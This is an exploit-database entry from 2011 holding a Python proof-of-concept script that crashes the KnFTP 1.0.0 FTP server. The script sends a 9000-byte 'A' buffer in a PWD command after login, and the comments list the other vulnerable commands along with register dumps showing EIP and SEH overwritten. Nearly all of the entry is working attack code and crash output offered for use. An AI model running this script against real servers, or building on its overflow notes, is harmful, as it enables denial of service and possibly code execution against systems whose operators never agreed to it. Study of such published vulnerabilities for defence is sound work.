KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)
| EKU-ID: 1000 | CVE: | OSVDB-ID: |
| Author: loneferret | Published: 2011-09-19 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1000 | CVE: | OSVDB-ID: |
| Author: loneferret | Published: 2011-09-19 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/python
# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/
# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwriten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDE000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDE000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDD000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
import socket
buffer = "\x41" * 9000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('PWD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close